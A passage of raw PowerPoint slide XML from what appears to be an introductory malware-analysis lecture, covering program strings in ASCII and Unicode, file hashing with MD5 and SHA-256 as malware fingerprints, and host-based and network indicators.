                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>triển</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>khai</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>giao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thức</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> FTP, HTTP, NTP.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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139594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Strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A program contains strings if it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Print a message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Connects to a URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Copies file to a specific location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Strings (often in ASCII or Unicode) reveals functionalities of a program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30177172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Strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ASCII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Unicode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1403648" y="1649294"/>
            <a:ext cx="6984776" cy="1563682"/>
            <a:chOff x="1403648" y="1649294"/>
            <a:chExt cx="6984776" cy="1563682"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rounded Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403648" y="2492896"/>
              <a:ext cx="1296144"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4C</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rounded Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2728748" y="2492896"/>
              <a:ext cx="1296144"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4F</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4024892" y="2492896"/>
              <a:ext cx="1296144"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56</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5321036" y="2492896"/>
              <a:ext cx="1296144"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45</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6642688" y="2492896"/>
              <a:ext cx="1296144"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00</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1910495" y="2101498"/>
              <a:ext cx="314510" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>L</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3219565" y="2101497"/>
              <a:ext cx="393056" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
                <a:t>O</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4515709" y="2110959"/>
              <a:ext cx="367408" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>V</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5811853" y="2110959"/>
              <a:ext cx="335348" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>E</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6632879" y="1649294"/>
              <a:ext cx="1755545" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Null </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Terminator</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1406561" y="4365104"/>
            <a:ext cx="6984776" cy="1584176"/>
            <a:chOff x="1406561" y="4365104"/>
            <a:chExt cx="6984776" cy="1584176"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1406561" y="5229200"/>
              <a:ext cx="66410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4C</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2731661" y="5208706"/>
              <a:ext cx="64807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4F</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4027805" y="5208706"/>
              <a:ext cx="674521"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56</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rounded Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5376847" y="5208706"/>
              <a:ext cx="605593"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45</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rounded Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6645601" y="5208706"/>
              <a:ext cx="64807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00</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1913408" y="4542050"/>
              <a:ext cx="314510" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>L</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3222478" y="4542049"/>
              <a:ext cx="393056" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
                <a:t>O</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4518622" y="4551511"/>
              <a:ext cx="367408" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>V</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5814766" y="4551511"/>
              <a:ext cx="335348" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>E</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6635792" y="4365104"/>
              <a:ext cx="1755545" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Null </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Terminator</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rounded Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2070663" y="5229200"/>
              <a:ext cx="66410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00</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rounded Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3379733" y="5208706"/>
              <a:ext cx="64807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00</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rounded Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4702326" y="5208706"/>
              <a:ext cx="674521"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00</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rounded Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5982440" y="5229200"/>
              <a:ext cx="605593"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00</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rounded Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7290760" y="5196101"/>
              <a:ext cx="648072" cy="72008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00</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Connector 32"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2728748" y="4509120"/>
              <a:ext cx="6017" cy="548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018278" y="4499658"/>
              <a:ext cx="6017" cy="548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321496" y="4536703"/>
              <a:ext cx="6017" cy="548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582016" y="4506361"/>
              <a:ext cx="6017" cy="54848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6957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Function</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Check the integrity of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Unique hash value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Common hash functions: MD-5, SHA-256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> - A Fingerprint for malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Share generated hash with other analysts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Search for generated hash on-line to see if the file has already identified</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16464509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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>process of investigating the behaviour of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>specific sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>To determine exactly what a particular suspect binary code can do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>How to detect it on the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>How to measure and contain its damage </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can be used to develop indicators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"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signatures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>indicator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>are used to detect malicious code on victim computers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>indicator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>are used to detect malicious code by monitoring network traffic.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
